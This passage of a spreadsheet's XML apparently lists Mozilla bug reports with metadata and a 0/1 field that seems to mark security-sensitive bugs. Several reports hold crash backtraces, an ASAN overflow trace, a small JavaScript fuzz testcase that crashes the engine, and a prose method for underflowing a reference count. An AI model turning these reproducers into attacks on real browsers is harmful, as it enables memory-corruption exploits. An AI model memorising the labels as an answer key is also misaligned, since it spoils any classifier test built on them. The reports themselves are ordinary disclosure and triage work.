#7  0x000000000073abe7 in js::mjit::ic::NativeCall (f=..., ic=0xb8abb8) at /srv/repos/mozilla-central/js/src/methodjit/MonoIC.cpp:1041
#8  0x00007ffff7f4728a in ?? ()
#9  0x00007ffff7f46eb0 in ?? ()
#10 0x0000000000000000 in ?? ()
Opt Crash:
Program received signal SIGSEGV, Segmentation fault.
js_GetMethod (cx=0x8de820, obj=0x7fff00000002, id=140737322830464, getHow=0, vp=0x7fffffffbac0) at /srv/repos/mozilla-central/js/src/jsobj.cpp:5144
5144        GenericIdOp op = obj-&gt;getOps()-&gt;getGeneric;
(gdb) bt
#0  js_GetMethod (cx=0x8de820, obj=0x7fff00000002, id=140737322830464, getHow=0, vp=0x7fffffffbac0) at /srv/repos/mozilla-central/js/src/jsobj.cpp:5144
#1  0x00000000004d9757 in js_ValueToSource (cx=0x8de820, v=...) at /srv/repos/mozilla-central/js/src/jsstr.cpp:3315
#2  0x0000000000412580 in JS_ValueToSource (cx=&lt;value optimized out&gt;, v=...) at /srv/repos/mozilla-central/js/src/jsapi.cpp:533
#3  0x00000000004082ec in ToSource (cx=0x8de820, argc=2, vp=0x7ffff63fb2a0) at /srv/repos/mozilla-central/js/src/shell/js.cpp:1160
#4  AssertEq (cx=0x8de820, argc=2, vp=0x7ffff63fb2a0) at /srv/repos/mozilla-central/js/src/shell/js.cpp:1190
#5  0x00000000005db576 in CallJSNative (this=0x7fffffffc370) at ../jscntxtinlines.h:314
#6  js::mjit::CallCompiler::generateNativeStub (this=0x7fffffffc370) at /srv/repos/mozilla-central/js/src/methodjit/MonoIC.cpp:811
#7  0x00000000005dbe23 in js::mjit::ic::NativeCall (f=..., ic=0x8edcf8) at /srv/repos/mozilla-central/js/src/methodjit/MonoIC.cpp:1041
#8  0x00007ffff7f470f2 in ?? ()
#9  0x00007ffff7f46d50 in ?? ()
#10 0x0000000000000000 in ?? ()
S-s and sg:critical due to gc-related memory safety problem.</t>
        </is>
      </c>
      <c r="X4094" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4095">
      <c r="A4095" t="n">
        <v>1517700</v>
      </c>
      <c r="B4095" t="inlineStr">
        <is>
          <t>2019-01-04 01:57:03 -0800</t>
        </is>
      </c>
      <c r="C4095" t="inlineStr">
        <is>
          <t>Add a new way to add new jobs to a push (a la `mach try fuzzy`)</t>
        </is>
      </c>
      <c r="D4095" t="inlineStr">
        <is>
          <t>2021-12-05 14:50:08 -0800</t>
        </is>
      </c>
      <c r="E4095" t="n">
        <v>1</v>
      </c>
      <c r="F4095" t="n">
        <v>1</v>
      </c>
      <c r="G4095" t="n">
        <v>7</v>
      </c>
      <c r="H4095" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4095" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4095" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4095" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4095" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4095" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4095" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4095" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4095" t="inlineStr"/>
      <c r="Q4095" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4095" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4095" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4095" t="n">
        <v>1</v>
      </c>
      <c r="U4095" t="n">
        <v>0</v>
      </c>
      <c r="V4095" t="n">
        <v>11</v>
      </c>
      <c r="W4095" t="inlineStr">
        <is>
          <t>`mach try fuzzy` lets you select runnable jobs from the command line, generated from the task graph it generates. You can search through the possible runnable jobs and add specific jobs to a list. When you're done, the list of selected jobs are submitted to try.
I want to add a feature to Treeherder similar to `mach try fuzzy`, as an alternative to the current "add new jobs" feature. Click the new button, and a modal dialog opens and displays the list of runnable jobs. You can filter the list with a searchbar, and select jobs from the list, and the final list is submitted as an action task, which will trigger the selected jobs (and any dependencies they may need).
Quick demo of the feature as it's currently written: https://www.youtube.com/watch?v=Y1yv8bWG-cs (apologies for the long second half while I wait for the add-jobs task to show up, complete, and trigger the new job... I forgot to hit the pause button during the recording).
PR coming tomorrow.</t>
        </is>
      </c>
      <c r="X4095" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4096">
      <c r="A4096" t="n">
        <v>768243</v>
      </c>
      <c r="B4096" t="inlineStr">
        <is>
          <t>2012-06-25 15:29:53 -0700</t>
        </is>
      </c>
      <c r="C4096" t="inlineStr">
        <is>
          <t>Assertion failure: i &lt; Length() (invalid array index), at ../../../dist/include/nsTArray.h:535</t>
        </is>
      </c>
      <c r="D4096" t="inlineStr">
        <is>
          <t>2013-04-30 18:41:13 -0700</t>
        </is>
      </c>
      <c r="E4096" t="n">
        <v>1</v>
      </c>
      <c r="F4096" t="n">
        <v>1</v>
      </c>
      <c r="G4096" t="n">
        <v>3</v>
      </c>
      <c r="H4096" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4096" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4096" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K4096" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4096" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4096" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4096" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4096" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4096" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q4096" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4096" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4096" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T4096" t="n">
        <v>1</v>
      </c>
      <c r="U4096" t="n">
        <v>0</v>
      </c>
      <c r="V4096" t="n">
        <v>120</v>
      </c>
      <c r="W4096" t="inlineStr">
        <is>
          <t>Created attachment 636508
Test case for browser
The attached HTML code triggers an assertion on Fennec Native (mozilla-central, debug build, rev e240d6e43c9a, might need 2-3 runs to actually abort).
The assertion did not trigger on a Firefox desktop debug build for me. Marking s-s because this could be an out-of-range problem.</t>
        </is>
      </c>
      <c r="X4096" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4097">
      <c r="A4097" t="n">
        <v>777806</v>
      </c>
      <c r="B4097" t="inlineStr">
        <is>
          <t>2012-07-26 11:16:27 -0700</t>
        </is>
      </c>
      <c r="C4097" t="inlineStr">
        <is>
          <t>XHR use-after-free of JS</t>
        </is>
      </c>
      <c r="D4097" t="inlineStr">
        <is>
          <t>2016-12-01 13:31:02 -0800</t>
        </is>
      </c>
      <c r="E4097" t="n">
        <v>1</v>
      </c>
      <c r="F4097" t="n">
        <v>1</v>
      </c>
      <c r="G4097" t="n">
        <v>3</v>
      </c>
      <c r="H4097" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4097" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4097" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K4097" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4097" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4097" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4097" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4097" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4097" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q4097" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4097" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4097" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T4097" t="n">
        <v>1</v>
      </c>
      <c r="U4097" t="n">
        <v>0</v>
      </c>
      <c r="V4097" t="n">
        <v>42</v>
      </c>
      <c r="W4097" t="inlineStr">
        <is>
          <t>Created attachment 646222
Test change that triggers the crash
When we landed the attached tweak to a test in 771666, this random orange started occuring - it doesn't seem to happen in ASAN builds, but seems to be 100% reproducible if you run the test *twice* in one session with EXTRA_TEST_ARGS="--repeat=1"
Assertion failure: allocated(), at ../../../dist/include/gc/Heap.h:497
Program received signal SIGSEGV, Segmentation fault.
js::gc::ArenaHeader::getAllocKind (this=0x7fffc645c000) at ../../../dist/include/gc/Heap.h:497
497             JS_ASSERT(allocated());
(gdb) bt
#0  js::gc::ArenaHeader::getAllocKind (this=0x7fffc645c000) at ../../../dist/include/gc/Heap.h:497
#1  0x00007ffff4cbc40d in js::gc::Cell::getAllocKind (this=0x7fffc645c020) at /home/johns/moz/moz-git/js/src/gc/Heap.h:935
#2  0x00007ffff4d415ad in js::gc::GetGCThingTraceKind (thing=0x7fffc645c020) at /home/johns/moz/moz-git/js/src/jsgcinlines.h:30
#3  0x00007ffff4d538d5 in js_GetGCThingTraceKind (thing=0x7fffc645c020) at /home/johns/moz/moz-git/js/src/jsgc.cpp:1760
#4  0x00007ffff36905b5 in xpc_GCThingIsGrayCCThing (thing=0x7fffc645c020)
    at /home/johns/moz/moz-git/js/xpconnect/src/nsXPConnect.cpp:574
#5  0x00007ffff41f551f in ChildFinder::NoteJSChild (this=0x7fffffffaeb0, child=0x7fffc645c020)
    at /home/johns/moz/moz-git/xpcom/base/nsCycleCollector.cpp:1991
#6  0x00007ffff414b8b8 in nsScriptObjectTracer::NoteJSChild (aScriptThing=0x7fffc645c020, name=0x7ffff52f0967 "mResultJSON", 
    aClosure=0x7fffffffaeb0) at /home/johns/moz/ff-dbg/xpcom/build/nsCycleCollectionParticipant.cpp:16
#7  0x00007ffff29ef110 in nsXMLHttpRequest::cycleCollection::TraceImpl(void*, void (*)(void*, char const*, void*), void*) ()
   from /home/johns/moz/ff-dbg/dist/bin/libxul.so
#8  0x00007ffff2b8c91f in nsDOMEventTargetHelper::cycleCollection::TraverseImpl(nsDOMEventTargetHelper::cycleCollection*, void*, nsCycleCollectionTraversalCallback&amp;) () from /home/johns/moz/ff-dbg/dist/bin/libxul.so
#9  0x00007ffff29eb853 in nsXHREventTarget::cycleCollection::TraverseImpl(nsXHREventTarget::cycleCollection*, void*, nsCycleCollectionTraversalCallback&amp;) () from /home/johns/moz/ff-dbg/dist/bin/libxul.so
#10 0x00007ffff29ee4d3 in nsXMLHttpRequest::cycleCollection::TraverseImpl(nsXMLHttpRequest::cycleCollection*, void*, nsCycleCollectionTraversalCallback&amp;) () from /home/johns/moz/ff-dbg/dist/bin/libxul.so
#11 0x00007ffff28a4afe in nsCycleCollectionParticipant::Traverse (this=0x7ffff626e7f8, p=0x7fffc133dc00, cb=...)
    at ../../../dist/include/nsCycleCollectionParticipant.h:262
#12 0x00007ffff41f56cb in MayHaveChild (o=0x7fffc133dc00, cp=0x7ffff626e7f8)
    at /home/johns/moz/moz-git/xpcom/base/nsCycleCollector.cpp:2022
#13 0x00007ffff41f5625 in nsPurpleBuffer::RemoveSkippable (this=0x7fffe91b0090, removeChildlessNodes=true)
    at /home/johns/moz/moz-git/xpcom/base/nsCycleCollector.cpp:2042
#14 0x00007ffff41f57d0 in nsCycleCollector::ForgetSkippable (this=0x7fffe91b0000, removeChildlessNodes=true)
    at /home/johns/moz/moz-git/xpcom/base/nsCycleCollector.cpp:2066
#15 0x00007ffff41f818e in nsCycleCollector_forgetSkippable (aRemoveChildlessNodes=true)
    at /home/johns/moz/moz-git/xpcom/base/nsCycleCollector.cpp:3217
#16 0x00007ffff2ee544a in FireForgetSkippable (aSuspected=496, aRemoveChildless=true)
    at /home/johns/moz/moz-git/dom/base/nsJSEnvironment.cpp:3033
#17 0x00007ffff2ee5b5b in CCTimerFired (aTimer=0x7fffc6296dc0, aClosure=0x0)
    at /home/johns/moz/moz-git/dom/base/nsJSEnvironment.cpp:3268</t>
        </is>
      </c>
      <c r="X4097" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4098">
      <c r="A4098" t="n">
        <v>662132</v>
      </c>
      <c r="B4098" t="inlineStr">
        <is>
          <t>2011-06-05 01:14:42 -0700</t>
        </is>
      </c>
      <c r="C4098" t="inlineStr">
        <is>
          <t>TI: Crash [@ JSString::isFlat]</t>
        </is>
      </c>
      <c r="D4098" t="inlineStr">
        <is>
          <t>2013-12-27 14:27:17 -0800</t>
        </is>
      </c>
      <c r="E4098" t="n">
        <v>1</v>
      </c>
      <c r="F4098" t="n">
        <v>1</v>
      </c>
      <c r="G4098" t="n">
        <v>3</v>
      </c>
      <c r="H4098" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4098" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4098" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4098" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4098" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4098" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4098" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4098" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4098" t="inlineStr">
        <is>
          <t>[sg:critical?] [jst likes for 6] [landed m-c 6/27][fixed-in-tracemonkey][qa-]</t>
        </is>
      </c>
      <c r="Q4098" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4098" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4098" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4098" t="n">
        <v>1</v>
      </c>
      <c r="U4098" t="n">
        <v>0</v>
      </c>
      <c r="V4098" t="n">
        <v>24</v>
      </c>
      <c r="W4098" t="inlineStr">
        <is>
          <t>gczeal()
let n = {}
let o = {}
for (let i = 0; i &lt; 5; i++) {
    Array();
    for (let j = 0; j &lt; 7; j++) {
        o.__defineSetter__("", function() {})
        o.p3 = 1
        delete o.p3
    }
}
crashes js debug shell on JM changeset 6d423e5f2e48 with -m, -j and -n at JSString::isFlat
This was found using a combination of jsfunfuzz and jandem's method fuzzer.
(gdb) bt
#0  0x000000010003d134 in JSString::isFlat (this=0x13e760) at jsstr.h:313
#1  0x00000001000477b5 in JSString::ensureFlat (this=0x13e760, cx=0x100925920) at jsstr.h:723
#2  0x0000000100047835 in JSString::getCharsZ (this=0x13e760, cx=0x100925920) at jsstr.h:703
#3  0x00000001000478e0 in js::types::MakeTypeId (cx=0x100925920, id={asBits = 1304416}) at jsinferinlines.h:118
#4  0x00000001000e99f2 in InlineAddTypeProperty (cx=0x100925920, obj=0x1009301c0, id={asBits = 1304416}, type=1) at /Users/fuzz3/Desktop/jsfunfuzz-dbg-64-jm-70388-6d423e5f2e48/compilePath/js/src/jsinfer.cpp:2723
#5  0x00000001000d671d in js::types::TypeObject::addPropertyType (this=0x1009301c0, cx=0x100925920, id={asBits = 1304416}, type=1) at /Users/fuzz3/Desktop/jsfunfuzz-dbg-64-jm-70388-6d423e5f2e48/compilePath/js/src/jsinfer.cpp:2739
#6  0x00000001001f5554 in js::types::AddTypePropertyId (cx=0x100925920, obj=0x1009301c0, id={asBits = 1304416}, type=1) at jsinferinlines.h:325
#7  0x000000010005a046 in JSObject::deleteProperty (this=0x100f16160, cx=0x100925920, id={asBits = 1304416}, rval=0x7fff5fbfdb10, strict=0) at jsobjinlines.h:161
#8  0x00000001002b093f in js::mjit::stubs::DelProp&lt;0&gt; (f=@0x7fff5fbfdb40, atom=0x13e760) at /Users/fuzz3/Desktop/jsfunfuzz-dbg-64-jm-70388-6d423e5f2e48/compilePath/js/src/methodjit/StubCalls.cpp:2649
#9  0x0000000100e67583 in ?? ()
#10 0x00000001002acb4d in js::mjit::EnterMethodJIT (cx=0x100925920, fp=0x100a67048, code=0x100e67fc0, stackLimit=0x100b1cb00) at /Users/fuzz3/Desktop/jsfunfuzz-dbg-64-jm-70388-6d423e5f2e48/compilePath/js/src/methodjit/MethodJIT.cpp:886
#11 0x00000001002acc82 in CheckStackAndEnterMethodJIT (cx=0x100925920, fp=0x100a67048, code=0x100e67fc0) at /Users/fuzz3/Desktop/jsfunfuzz-dbg-64-jm-70388-6d423e5f2e48/compilePath/js/src/methodjit/MethodJIT.cpp:918
/snip</t>
        </is>
      </c>
      <c r="X4098" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4099">
      <c r="A4099" t="n">
        <v>1464039</v>
      </c>
      <c r="B4099" t="inlineStr">
        <is>
          <t>2018-05-24 05:23:17 -0700</t>
        </is>
      </c>
      <c r="C4099" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow READ 4 · qcms_transform_module_clut_only</t>
        </is>
      </c>
      <c r="D4099" t="inlineStr">
        <is>
          <t>2019-08-22 09:25:29 -0700</t>
        </is>
      </c>
      <c r="E4099" t="n">
        <v>1</v>
      </c>
      <c r="F4099" t="n">
        <v>1</v>
      </c>
      <c r="G4099" t="n">
        <v>3</v>
      </c>
      <c r="H4099" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4099" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4099" t="inlineStr">
        <is>
          <t>Graphics: Color Management</t>
        </is>
      </c>
      <c r="K4099" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4099" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4099" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4099" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4099" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4099" t="inlineStr">
        <is>
          <t>[disclosure deadline August 22][adv-main61+][adv-esr52.9+][adv-esr60.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4099" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4099" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4099" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T4099" t="n">
        <v>1</v>
      </c>
      <c r="U4099" t="n">
        <v>0</v>
      </c>
      <c r="V4099" t="n">
        <v>35</v>
      </c>
      <c r="W4099" t="inlineStr">
        <is>
          <t>Created attachment 8980251
clusterfuzz-testcase-minimized-fuzz-5982351954804736
Note: This was found by Google's OSS-Fuzz and as a result there is a 90 day disclosure deadline.
The attachment can be used as an input to the fuzzer: https://github.com/google/oss-fuzz/blob/master/projects/qcms/fuzz.cc
[Environment] ASAN_OPTIONS = redzone=128:strict_string_check=1:strict_memcmp=1:allow_user_segv_handler=0:allocator_may_return_null=1:handle_sigfpe=1:handle_sigbus=1:detect_stack_use_after_return=1:alloc_dealloc_mismatch=0:print_scariness=1:strip_path_prefix=/workspace/:max_uar_stack_size_log=16:quarantine_size_mb=256:detect_odr_violation=0:handle_sigill=1:allocator_release_to_os_interval_ms=500:coverage=0:use_sigaltstack=1:fast_unwind_on_fatal=0:detect_leaks=1:print_summary=1:handle_abort=1:check_malloc_usable_size=0:detect_container_overflow=1:symbolize=0:handle_segv=1
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x609000000074 at pc 0x000000531f06 bp 0x7ffc9190bbc0 sp 0x7ffc9190bbb8
	READ of size 4 at 0x609000000074 thread T0
	SCARINESS: 27 (4-byte-read-heap-buffer-overflow-far-from-bounds)
	#0 0x531f05 in qcms_transform_module_clut_only /src/firefox/gfx/qcms/chain.c:153:21
	#1 0x53005d in qcms_modular_transform_data /src/firefox/gfx/qcms/chain.c:975:17
	#2 0x52faaa in qcms_chain_transform /src/firefox/gfx/qcms/chain.c:988:16
	#3 0x540849 in qcms_transform_precacheLUT_float /src/firefox/gfx/qcms/transform.c:1182:9
	#4 0x543ea8 in qcms_transform_create /src/firefox/gfx/qcms/transform.c:1248:28
	#5 0x54b859 in transform(_qcms_profile*, _qcms_profile*, int) /src/fuzz.cc:24:31
	#6 0x54b772 in LLVMFuzzerTestOneInput /src/fuzz.cc:64:3
	#7 0x54998f in ExecuteFilesOnyByOne(int, char**) /src/libfuzzer/afl/afl_driver.cpp:301:5
	#8 0x549f3e in main /src/libfuzzer/afl/afl_driver.cpp:339:12
	#9 0x7f3d3e62a82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/libc-start.c:291
	#10 0x41c978 in _start
	0x609000000074 is located 12 bytes to the left of 1-byte region [0x609000000080,0x609000000081)
	allocated by thread T0 here:
	#0 0x4ea807 in malloc _asan_rtl_
	#1 0x52e3b7 in qcms_modular_transform_create_mAB /src/firefox/gfx/qcms/chain.c:584:10
	#2 0x52d203 in qcms_modular_transform_create_input /src/firefox/gfx/qcms/chain.c:723:19
	#3 0x52fbf8 in qcms_modular_transform_create /src/firefox/gfx/qcms/chain.c:902:16
	#4 0x52fa71 in qcms_chain_transform /src/firefox/gfx/qcms/chain.c:986:50
	#5 0x540849 in qcms_transform_precacheLUT_float /src/firefox/gfx/qcms/transform.c:1182:9
	#6 0x543ea8 in qcms_transform_create /src/firefox/gfx/qcms/transform.c:1248:28
	#7 0x54b859 in transform(_qcms_profile*, _qcms_profile*, int) /src/fuzz.cc:24:31
	#8 0x54b772 in LLVMFuzzerTestOneInput /src/fuzz.cc:64:3
	#9 0x54998f in ExecuteFilesOnyByOne(int, char**) /src/libfuzzer/afl/afl_driver.cpp:301:5
	#10 0x549f3e in main /src/libfuzzer/afl/afl_driver.cpp:339:12
	#11 0x7f3d3e62a82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/libc-start.c:291
	SUMMARY: AddressSanitizer: heap-buffer-overflow (/mnt/scratch0/clusterfuzz/slave-bot/builds/clusterfuzz-builds-afl_qcms_6de1215797ff093b4b972acc94def85d38f18127/revisions/fuzz+0x531f05)
	Shadow bytes around the buggy address:
	0x0c127fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
	0x0c127fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
	0x0c127fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
	0x0c127fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
	0x0c127fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
	=&gt;0x0c127fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa
	0x0c127fff8010: 01 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c127fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c127fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c127fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c127fff805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1==ABORTING</t>
        </is>
      </c>
      <c r="X4099" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4100">
      <c r="A4100" t="n">
        <v>808736</v>
      </c>
      <c r="B4100" t="inlineStr">
        <is>
          <t>2012-11-05 12:59:17 -0800</t>
        </is>
      </c>
      <c r="C4100" t="inlineStr">
        <is>
          <t>sJSGCThingRootCount maybe can in theory be abused to trigger nsLayoutStatics::Shutdown()</t>
        </is>
      </c>
      <c r="D4100" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4100" t="n">
        <v>1</v>
      </c>
      <c r="F4100" t="n">
        <v>1</v>
      </c>
      <c r="G4100" t="n">
        <v>3</v>
      </c>
      <c r="H4100" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4100" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4100" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4100" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4100" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4100" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4100" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4100" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P4100" t="inlineStr">
        <is>
          <t>[fixed by bug 811206][adv-main20+]</t>
        </is>
      </c>
      <c r="Q4100" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4100" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4100" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4100" t="n">
        <v>1</v>
      </c>
      <c r="U4100" t="n">
        <v>0</v>
      </c>
      <c r="V4100" t="n">
        <v>2</v>
      </c>
      <c r="W4100" t="inlineStr">
        <is>
          <t>Whenever we call nsContentUtils::HoldJSObjects, we increment sJSGCThingRootCount, and call nsLayoutStatics::AddRef() if the count was initially 0. Whenever we call nsContentUtils::DropJSObjects, we decrement the count, and call nsLayoutStatics::Release() if the count ends up at 0.
If the static release hits 0, then a bunch of shutdown stuff gets triggered.
The problem here is that there's no checking that the number of calls to HOLD is actually balanced with the number of DROP calls. I noticed that with AudioContext (and probably any other wrapper cached object that also have JS objects) we can end up calling DROP multiple times for a single object, once if the object is preserved, for the wrapper, and once for the extra JS stuff I guess.
Thus, by creating and destroying an AudioContext, we can cause sJSGCThingRootCount to decrease. If we do this enough, eventually the count will be 0, and we'll call nsLayoutStatics::Release(). This is probably not a huge deal is isolation, because at worst it will slightly mess up shutdown. But we can try to do this repeatedly to cause it to happen otherwise.
Note that we have to do this without calling nsContentUtils::HoldJSObjects when the refcount is 0, because that will just cause nsLayoutStatics::AddRef() to trigger again, thwarting us.
But, once it is dropping past zero, we can just keep going, then the count will underflow and up at a large value. Thus for every 4.3 billion AudioContexts we create and destroy, we can cause the static count to drop. They aren't alive at the same time (though you'd want to have a bunch alive at the same time to reduce the chance we call HOLD when the count is exactly zero).
This doesn't seem like a practical attack to me, but I have see the count underflow, so there's some kind of issue here we should fix.</t>
        </is>
      </c>
      <c r="X4100" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4101">
      <c r="A4101" t="n">
        <v>1231359</v>
      </c>
      <c r="B4101" t="inlineStr">
        <is>
          <t>2015-12-09 07:17:24 -0800</t>
        </is>
      </c>
      <c r="C4101" t="inlineStr">
        <is>
          <t>[experiment] Simplify the hidden preferences that control whether Tracking Protection is enabled in non-private windows</t>
        </is>
      </c>
      <c r="D4101" t="inlineStr">
        <is>
          <t>2016-05-10 09:13:27 -0700</t>
        </is>
      </c>
      <c r="E4101" t="n">
        <v>1</v>
      </c>
      <c r="F4101" t="n">
        <v>1</v>
      </c>
      <c r="G4101" t="n">
        <v>2</v>
      </c>
      <c r="H4101" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4101" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4101" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K4101" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4101" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4101" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4101" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4101" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4101" t="inlineStr">
        <is>
          <t>[fxprivacy] [strings]</t>
        </is>
      </c>
      <c r="Q4101" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4101" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4101" t="inlineStr">
        <is>
          <t>Firefox 46</t>
        </is>
      </c>
      <c r="T4101" t="n">
        <v>1</v>
      </c>
      <c r="U4101" t="n">
        <v>0</v>
      </c>
      <c r="V4101" t="n">
        <v>31</v>
      </c>
      <c r="W4101" t="inlineStr">
        <is>
          <t>We need a new checkbox in the privacy section of the preferences tab for enabling TP in normal browsing mode. It will be followed by two radio buttons for selecting whether TP will be used in private windows (Default), "Always", or never use TP in case the checkbox is unchecked. Choosing “Always” (use TP) will enable DNT by flipping the privacy.donottrackheader.enabled pref and send the DNT signal to all sites.</t>
        </is>
      </c>
      <c r="X4101" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4102">
      <c r="A4102" t="n">
        <v>932449</v>
      </c>
      <c r="B4102" t="inlineStr">
        <is>
          <t>2013-10-29 12:34:46 -0700</t>
        </is>
      </c>
      <c r="C4102" t="inlineStr">
        <is>
